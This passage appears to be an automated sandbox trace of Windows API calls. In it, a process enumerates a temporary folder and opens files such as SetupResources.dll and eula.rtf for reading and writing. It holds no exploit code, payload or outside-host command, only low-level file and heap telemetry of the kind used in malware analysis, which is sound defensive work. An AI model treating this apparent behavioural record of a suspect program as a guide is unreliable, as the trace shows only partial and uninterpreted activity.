InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.123] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.123] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.124] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0060.124] AreFileApisANSI () returned 1 [0060.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.124] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0060.124] AreFileApisANSI () returned 1 [0060.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.124] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b00 [0060.124] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0060.124] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.222] GetFileType (hFile=0x420) returned 0x1 [0060.222] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0060.222] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.222] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.222] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.223] CloseHandle (hObject=0x420) returned 1 [0060.223] AreFileApisANSI () returned 1 [0060.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0060.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0060.223] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0060.223] GetFileType (hFile=0x420) returned 0x1 [0060.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.223] CloseHandle (hObject=0x420) returned 1 [0060.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.223] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.223] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0060.224] AreFileApisANSI () returned 1 [0060.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.224] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b68 [0060.224] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e1f0, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1025\\SetupResources.dll") returned 46 [0060.224] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1025\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1025\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358)) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.224] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.224] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.224] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x460c0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䍘")) returned 0 [0060.224] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x465f8 | out: hHeap=0x20000) returned 1 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x535b0 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0060.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.225] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x535b0 | out: hHeap=0x20000) returned 1 [0060.225] AreFileApisANSI () returned 1 [0060.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028", lpUsedDefaultChar=0x0) returned 27 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.225] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.225] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0060.226] AreFileApisANSI () returned 1 [0060.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028") returned 27 [0060.226] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028" (normalized: "c:\\588bce7c90097ed212\\1028"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.226] GetLastError () returned 0x5 [0060.226] GetLastError () returned 0x5 [0060.226] SetLastError (dwErrCode=0x5) [0060.226] GetLastError () returned 0x5 [0060.226] SetLastError (dwErrCode=0x5) [0060.226] GetLastError () returned 0x5 [0060.226] SetLastError (dwErrCode=0x5) [0060.226] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.226] AreFileApisANSI () returned 1 [0060.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0060.226] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0060.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88518, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028") returned 27 [0060.226] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028" (normalized: "c:\\588bce7c90097ed212\\1028"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0060.226] GetLastError () returned 0x5 [0060.226] GetLastError () returned 0x5 [0060.227] SetLastError (dwErrCode=0x5) [0060.227] GetLastError () returned 0x5 [0060.227] SetLastError (dwErrCode=0x5) [0060.227] GetLastError () returned 0x5 [0060.227] SetLastError (dwErrCode=0x5) [0060.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0060.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0060.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.227] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0060.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0060.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0060.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.227] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0060.227] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1029", cAlternateFileName="")) returned 1 [0060.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0060.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0060.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.227] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.227] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1028\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0060.228] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.228] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x18a5, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0060.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0060.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0060.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0060.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0060.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0060.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0060.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0060.228] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0060.228] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0060.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0060.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0060.229] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0060.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0060.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0060.229] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0060.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71688 [0060.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0060.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0060.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0060.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0060.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0060.230] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0060.230] AreFileApisANSI () returned 1 [0060.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1028\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0060.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.230] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0060.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0060.230] AreFileApisANSI () returned 1 [0060.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0060.230] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x69300 [0060.230] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dd90, cbMultiByte=-1, lpWideCharStr=0x69300, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1028\\eula.rtf") returned 36 [0060.230] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1028\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1028\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 